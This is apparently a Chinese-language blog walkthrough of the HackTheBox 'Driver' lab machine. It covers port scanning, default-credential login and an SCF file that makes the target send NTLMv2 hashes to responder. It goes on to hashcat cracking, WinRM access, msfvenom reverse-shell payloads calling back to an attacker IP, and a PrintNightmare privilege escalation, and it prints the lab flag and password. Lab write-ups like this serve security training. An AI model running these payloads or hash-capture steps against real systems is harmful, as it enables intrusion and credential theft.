HTB-Driver

metafa1ica
  2025-08-03 14:03:19 2025-08-03 14:03:19 创建   2025-08-17 13:29:27 2025-08-17 13:29:27 更新    
1
2
3
ip='10.129.254.60'
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1| tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip

开了80,135,445,5985

上来basic登录

image

admin/admin直接进来了

image

这里也有提示

image

responder

htb提示搜smb share upload file attack

https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/forced-coercion/url-file-attack

搜到这篇文章,其中有个scf文件模板,联想到smb,那显然是responder

1
2
3
4
5
[Shell]
Command=2
IconFile=\\10.10.16.42\share\icon.ico
[Taskbar]
Command=ToggleDesktop
1
responder -I tun0 -v

直接抓到一堆认证

image

1
2
3
[SMB] NTLMv2-SSP Client   : 10.129.254.60
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:f57ce3d84a0014ca:D7C6AFAAECA98BD6C931D0BEAF5B038B:010100000000000000319ACE3D04DC01A03CD14003DC68D20000000002000800490054005300480001001E00570049004E002D00500046004800480033003300410053004D003000430004003400570049004E002D00500046004800480033003300410053004D00300043002E0049005400530048002E004C004F00430041004C000300140049005400530048002E004C004F00430041004C000500140049005400530048002E004C004F00430041004C000700080000319ACE3D04DC010600040002000000080030003000000000000000000000000020000031B6C5D19A0F2E0804B570B9C4C260A5CC3FAC161E5F207BF5FB7249792E755A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0034003200000000000000000000000000 
1
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

爆破出密码为liltony

1
nxc smb $ip -u 'tony' -p 'liltony' --shares

image

1
2
nxc winrm $ip -u 'tony' -p 'liltony'
evil-winrm -i $ip -u 'tony' -p 'liltony'

显然可以winrm

image

image

286b2149b0ed831c5264d8304bd2f37c

提权

RICOH

powershell的历史记录有东西

1
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

image

有个RICOH PCL6 UniversalDriver V4.23

1
icacls "c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\*.dll"

F标志表示完全访问, I标志表示权限是从父目录继承的。继承的可写标志源自父目录。

image

1
icacls "c:\ProgramData\RICOH_DRV

整个目录都有完全控制权

image

启动msf,搜索下相关模块

image

但看options需要一个session,所以先上msf马

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.42 LPORT=4444 -f exe >shell.exe
1
2
3
4
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4444

image

试了好几次都不行

image

看了眼代码也不知道哪里卡主了,似乎是条件竞争的洞,懒得折腾了

image

PrintNightmare

1
nxc smb $ip -u tony -p liltony -M spooler

image​​

既然有打印机,就不得不查下打印机噩梦这个洞了

1
nxc smb $ip -u tony -p liltony -M printnightmare

提示漏洞存在,且工具也说了

image

msf生成个dll,然后上传

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.42 LPORT=4444 -f dll >shell.dll

执行exp

1
python printnightmare.py -dll 'C:\Users\tony\shell.dll' 'tony:liltony@$DRIVER'

试了两回,第一回还是tony,第二回成功了

image

image

image

  • 标题: HTB-Driver
  • 作者: metafa1ica
  • 创建于 : 2025-08-03 14:03:19
  • 更新于 : 2025-08-17 13:29:27
  • 链接: https://metafa1ica.github.io/post/11acd23e8de2/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
HTB-Driver
  1. responder
  2. 提权
    1. RICOH
    2. PrintNightmare